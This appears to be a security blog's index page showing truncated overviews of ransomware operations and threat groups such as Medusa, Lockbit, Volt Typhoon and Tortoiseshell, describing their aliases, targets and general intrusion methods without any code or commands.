Blogs by Ashwin

  Overview Medusa, also known as MedusaLocker, is a ransomware discovered in 2019. It operates in a ransomware-as-a-service (RaaS) business model and goes for double extortion tactic stealing the victim's data before encryption. It mainly targets big organizations with high volumes of Personal Identifiable Information (PII), health sector, and educational sectors. Medusa generally gain access via brute-force attacks on Remote Desktop Protocol (RDP), leaked RDP credentials, or spear-phishing attacks to steal user credentials. Understanding Medusa Since its discovery, Medusa have seen drastic changes in its ransomware activities and extortion tactics. They have even launched their dedicated leak site in early 2023, called the Medusa Blog, where they disclose sensitive data of the victims who does not comply with their demands.  They employ a multi-extortion strategy and offer multiple options to their victims. All the options such as time extension, data deletion, or download of all

  Overview Deadeye Jackal, also known as Syrian Electronic Army (SEA), Syria Malware Team, ATK 196, TAG-CT2, is a group of computer hackers that surfaced online in 2011 in support of the Syrian President Bashar-al-Assad. They have targeted many western organizations, human rights groups, political opposition groups, and websites. They make use of phishing, spamming, website defacement, malware, and denial of service attacks to execute their malicious plans. The government websites of the Middle East, Europe, and US defense contractors are also not safe from their hacking spree.  Syria was the first Arab country to have a public Internet Army hosted on its national networks that can openly launch cyber attacks on its enemies. However, the nature of relationship between the government and the threat actor group has changed and unclear at present.  Capabilities The Deadeye Jackal group uses SilverHawk as a malware tool and it can do the following in a network and computer: Record audio or

  Overview ShinyHunters is a criminal black-hat hacker group. It appeared in 2020 and 2021, and have done numerous data breaches to sell the stolen data on dark web. Its name is derived from a mechanic, shiny Pokemon, in the Pokemon video game franchise. In this game, the Pokemon have a rare chance to encounter an alternate "shiny" color scheme, considered as elusive to the players. A group's avatar on their Twitter profile also contains the picture of a shiny Pokemon. Recently, a key member of the threat group named, Sebastien Raoult, was arrested and pleaded guilty for his cyber crimes. He is a 22-year old French man, also known as Sezyo Kaizen, was sentenced to three years in prison and ordered to pay $5 million in restitution.  Data Breaches in the Targeted Organizations ShinyHunters have stolen a large amount data from following organizations and even asked ransom from some of them:  AT&T Wireless Tokopedia Wishbone Microsoft Wattpad Pluto TV Animal Jam Mashable

  What is Lockbit Ransomware? It is a dangerous software designed to block user access to computer systems. Formerly known as "ABCD" ransomware, Lockbit is a subclass of 'crypto virus' mostly interested in government organizations and enterprises rather than individuals. Its past targets includes India, USA, China, Indonesia, Ukraine, France, UK, and Germany. Presumably, it avoids attacking systems local to Russia or other countries within the Commonwealth of Independent States. This might be done to avoid prosecution in those areas.  Lockbit also works as a ransomware-as-a-service (RaaS), where willing parties pay for hire attacks and profits under an affiliate framework.  How Does Lockbit works? Lockbit ransomware is considered to be a part of the "LockerGoga & MegaCortex" malware family because it shares some attributes of this malware group. Firstly, Lockbit exploits the weakness of a network via phishing email or brute force attack to get inside a n

  About Babuk Ransomware Discovered in 2021, Babuk ransomware is a new cyber threat that has already targeted at least five big enterprises among which one of them is already paying the ransom of $85,000 after negotiations. Its codebase and artifacts are highly similar to Vasa Locker and like other ransomwares its operators too leaks the stolen data on a public website. The group behind Babuk have openly expressed their hatred towards BlackLivesMatter (BLM) and LGBT communities. It supports command line operation and make use of the embedded three different built-in commands to spread itself and encrypt the network resources. It always checks the pre-running processes and services beforehand to kill a predefined list and avoid detection.  Techniques Used Babuk generally uses phishing emails to intrude into a network. The attackers send an email to the victim disguised as a legitimate one, containing a malicious link. Once the attachment is opened, the malware downloads into the system.

  About Volt Typhoon is a Chinese-backed cyber espionage group, targeting legacy Cisco devices and expanded its attack infrastructure in a sophisticated and systematic campaign. As of now, it has compromised about 30% of the Cisco legacy routers on a SOHO botnet, used by multiple threat groups. They targets the critical infrastructure via the exploitation of the target's vulnerabilities and insert themselves into the victims' devices to take control of everything. Targets Volt Typhoon has successfully entered into the US critical infrastructure organizations, thus indicating a potential future disruption. The targeted attacks includes water utilities, power suppliers, transportation, and communication systems of the countries like the US, UK, and Australia.  How does Volt Typhoon works? The initial access is achieved via internet-facing Fortinet FortiGuard Devices. They leverage any type of privileges offered by these devices to extract credentials to an Active Directory accoun

  Overview Team TNT is a threat group known for targeting the cloud and container environment globally. They leverage the cloud and container resources and deploy the cryptocurrency miners in the environments of the victim. The group has been active since 2019 and announced it was quitting in 2021. However, it seems that either they have reappeared or a copycat group, named WatchDog, is imitating their routine. Tactics & Techniques Team TNT has use Tsunami Malware as a part of their tactics and techniques. It is a botnet that specifically targets Linux systems. It has the ability to connect wit Command and Control (C2) server vis Internet Relay Chat (IRC) protocol. The server controls the botnet and issues commands to the infected systems. It operates (C2) via IRC channels, functioning like chat rooms on the IRC network. Every infected system join a specific channel on IRC server, and waits for commands. The instruction command might include downloading additional malware or perfor

  Overview Molerats malware is also known as ALUMINUM SARATOGA, Extreme Jackal, G0021, Gaza Cybergang, Gaza Hackers Team, Moonlight, and Operation Molerats. This malware mainly targeted the Middle East government institutions and global government organizations associated with geopolitics in the region.  It is a type of Advanced Persistent Threat (APT) that is mostly interested in Israel and Palestine, along with the other regions in the Middle East. The custom malware implant of the threat actor allows reconnaissance on the victim and exfiltrate data. It can also leverage multiple mechanisms to avoid automated threat analysis including geofencing based on IP addresses, only target computers with Arabic language packs installed, and password-protected archive files to distribute malware. Main Features Uses open-source and commercial packers for the backdoor.  Targets Middle East region. Uses Dropbox API for entire C2 communication.  Use RAR files for backdoor delivery as well as later

  Overview Tortoiseshell is an Iranian threat actor active since at least 2018. It was tracked by the broader security community under the names Crimson Sandstorm (previously Curium), Imperial Kitten, TA456, and Yellow Liderc. It uses both custom and off-the-shelf malware to target the IT providers of Saudi Arabia. Their main goal is to eventually compromise the IT providers' customers. Total 11 organizations were hit by this group with majority based in Saudi Arabia.  They use strategic website compromises as a ploy to facilitate the distribution of malware. In the years 2022 and 2023, they attacked many legitimate websites by embedding malicious JavaScript to gather more details about the visitors, their location, time of visit, and device information. The intrusions focused on the maritime, shipping and logistics sectors in the Mediterranean. If the victim is a high-value target, then IMAPLoader is also deployed as a follow-on payload. Motive This threat actor group targets IT p

  Introduction Operaion C-Major is an information threat campaign targeting India. It has stolen passport scans, photo IDs, and tax information of many high-ranking Indian officers as well as non-Indian military officials based in the country. Although the attacks are highly targeted but, they lacked sophistication in their tools and techniques.  The threat actor generally uses malicious emails to penetrate a network. It also exploits an old vulnerability via an easily traceable malware, allowing any researcher to map out its network infrastructure. Despite its sloppiness, the threat actors still managed to steal at least 16 gigabytes' worth of data from 160 targets. It is believed that the attackers are linked with Pakistan and also goes for the information available in the mobiles of their victims.  Methodology Similar to the other targeted attacks, Operation C-major also uses emails as their entry point. They gathers all the information about their victims' interests and fav